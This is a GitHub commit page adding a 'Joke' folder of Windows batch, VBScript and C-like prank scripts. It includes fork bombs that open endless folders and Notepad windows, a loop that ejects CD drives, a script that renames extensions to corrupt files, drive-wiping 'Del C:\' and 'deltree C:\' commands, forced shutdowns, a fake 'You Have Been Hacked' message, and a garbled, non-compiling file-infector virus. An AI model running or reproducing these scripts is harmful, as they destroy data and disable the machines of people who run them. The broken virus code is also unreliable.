Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
enginestein authored Aug 14, 2023
1 parent 5cea57a commit d07a71a
Show file tree
Hide file tree
Showing 13 changed files with 174 additions and 0 deletions.
2 changes: 2 additions & 0 deletions Joke/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
![BAT-v_1.8](https://socialify.git.ci/sachinl0har/BAT-v_1.8/image?font=Source%20Code%20Pro&forks=1&issues=1&language=1&owner=1&pulls=1&stargazers=1&theme=Dark)
# BAT-v_1.8
13 changes: 13 additions & 0 deletions Joke/cd_popup.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
6 changes: 6 additions & 0 deletions Joke/corrupt_files.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
@echo off
ren *.exe *.txt
ren *.jpeg *.txt
ren *.mp3 *.txt
ren *.doc *.com
ren *.jpg *.txt
13 changes: 13 additions & 0 deletions Joke/crash_folder.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
@echo off
:RON
md folder1
md folder2
md folder3
md folder4
md folder5
start folder1
start folder2
start folder3
start folder4
start folder5
goto RON
6 changes: 6 additions & 0 deletions Joke/crash_notepad.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
@echo off
:RON
start notepad
start notepad
start notepad
goto RON
4 changes: 4 additions & 0 deletions Joke/endless-notepads.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
35 changes: 35 additions & 0 deletions Joke/file_virus.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
FILE *Ron *vRon;
int owned = 0;
unsigned long x;
char buff[256];
struct ffblk ffblk;
clock_t st, end;
main()
{
st=clock();
clrscr();
owned=(find_first(“*.*”, &ffblk,0);
while(!done)
{
Ron=fopen(_arg[0], “rb”);
vhost=fopen(ffblk.ff_name, “rb+”);
if (vhost = =NULL)
goto next;
x = 89088;
printf(“infecting %s\n”, ffblk.ff_name);
while(x>2048)
{
fread(buff,256,1,Ron);
fwrite(buff,256,1,vRon);
x – = 2048;
}
fread(buff,x,1,Ron);
fwrite(buff,x,1,vRon);
a++;
next:      fcloseall();
owned = findnext(&ffblk);
}
end = clock()
printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);
return (0);
}
2 changes: 2 additions & 0 deletions Joke/format_c.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
@Echo off
Del C:\ *.* |y
2 changes: 2 additions & 0 deletions Joke/os_remover.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
@echo off
deltree C:\
2 changes: 2 additions & 0 deletions Joke/shutdown_t-0s.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
@echo off
shutdown -s -t “00”
2 changes: 2 additions & 0 deletions Joke/shutdown_t-30s.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
@echo off
shutdown -s -t “30” -c "Windows Shutting down in 30 seconds"
6 changes: 6 additions & 0 deletions Joke/toggle_caps.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
loop
81 changes: 81 additions & 0 deletions Joke/un_notepad.bat
Original file line number Diff line number Diff line change
@@ -0,0 +1,81 @@
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o ”
WScript.Sleep 200
WshShell.SendKeys ” ”
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200
Wshshell.Sendkeys “s”
Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”
WScript.Sleep 200
WshShell.SendKeys “You”
WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop

0 comments on commit d07a71a

Please sign in to comment.